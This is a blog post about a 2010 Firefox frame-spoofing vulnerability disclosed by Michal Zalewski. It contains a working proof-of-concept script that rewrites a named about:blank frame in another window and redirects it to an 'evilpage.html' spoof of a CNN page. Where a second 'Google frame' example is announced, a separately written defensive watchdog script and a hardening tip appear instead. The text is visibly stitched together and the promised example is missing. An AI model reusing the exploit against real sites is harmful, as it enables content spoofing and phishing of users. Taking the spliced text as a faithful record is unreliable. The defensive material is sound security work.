Firefox Frame Spoofing.

Hacker Halted 2010


Yep, Michal Zalewski is back with 4 new browser exploits. And when he is at the wheel you can expect some good fireworks. I picked one out of the list; this one deals with frame spoofing. I've heard about it a few times but never understood what they meant by it. Now Michal Zalewski shows us an example, and a really cool one at that. The code is fairly easy, a great intellectual exercise, but immensely dangerous. Sometimes I lose my faith in Firefox, and this is one of those days.

Description

Firefox allows third-party sites to replace IFRAMEs embedded on unrelated webpages through the use of the document.write() method. This problem was discovered back in 2006 and was meant to be addressed by this Bugzilla entry, but a distinct attack against about:blank frames, as well as all other IFRAMEs during their load stage, is still possible.

PoC: http://lcamtuf.coredump.cx/ifsnatch/

Spoofing a fake CNN page which is loaded as a popunder:

    <body onload="foobar()">
    <script>
    var pw;
    function foobar() {
      // Grab a reference to the already-open window named "CNNtarget"
      pw = open("", "CNNtarget");
      // After 3 s, rewrite the named about:blank frame inside it and close this window
      setTimeout("pw.frames['pipeCtrlFrame'].document.open();" +
                 "pw.frames['pipeCtrlFrame'].document.write('<scr' + 'ipt>" +
                 "location = \"http://lcamtuf.coredump.cx/ifsnatch/evilpage.html\";</scr' + 'ipt>');" +
                 "window.close()", 3000);
    }
    </script>

Another example that injects code into Google frame:

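Separately from the PoC above, here is an added defensive example (not code from the post or from lcamtuf's page): a parent-page watchdog that stamps each about:blank frame it creates with a random marker and re-checks the marker before trusting the frame, so a frame whose document was rewritten from another window (the document.open()/document.write() sequence the advisory describes) is reported. The frame window and document are modelled as plain objects (an assumption of this example) so the logic runs outside a browser.

```javascript
const STATUS = { OK: "ok", REPLACED: "replaced", INACCESSIBLE: "inaccessible" };

function stampFrame(frameWindow, marker) {
  // Only the creator of an about:blank frame can write into it at this point.
  frameWindow.document.documentElement.setAttribute("data-frame-marker", marker);
}

function checkFrame(frameWindow, marker) {
  let root;
  try {
    // Cross-origin access throws: the frame has been navigated elsewhere.
    root = frameWindow.document.documentElement;
  } catch (e) {
    return STATUS.INACCESSIBLE;
  }
  // document.open() discards the old document, so a rewritten frame has no marker.
  return root && root.getAttribute("data-frame-marker") === marker ? STATUS.OK : STATUS.REPLACED;
}

// Constructed stand-in for a frame's window/document, used only for this demo.
function makeFrame() {
  const attrs = {};
  const el = {
    setAttribute: (k, v) => { attrs[k] = v; },
    getAttribute: (k) => (k in attrs ? attrs[k] : null),
  };
  const win = { document: { documentElement: el } };
  // Simulates document.open() + document.write() from a third-party window.
  win.rewrite = () => { win.document = { documentElement: { getAttribute: () => null } }; };
  // Simulates the frame being navigated to another origin.
  win.navigateAway = () => {
    Object.defineProperty(win, "document", { get() { throw new Error("SecurityError"); } });
  };
  return win;
}

function demo() {
  // In a browser use crypto.getRandomValues() for the marker; Math.random is demo only.
  const marker = "m-" + Math.random().toString(36).slice(2);
  const good = makeFrame(), rewritten = makeFrame(), navigated = makeFrame();
  [good, rewritten, navigated].forEach((f) => stampFrame(f, marker));
  rewritten.rewrite();
  navigated.navigateAway();
  return {
    good: checkFrame(good, marker),
    rewritten: checkFrame(rewritten, marker),
    navigated: checkFrame(navigated, marker),
  };
}
```

Unpredictable frame and window names, rather than fixed ones like `pipeCtrlFrame` or `CNNtarget`, also deny a third-party page the by-name reference the PoC relies on.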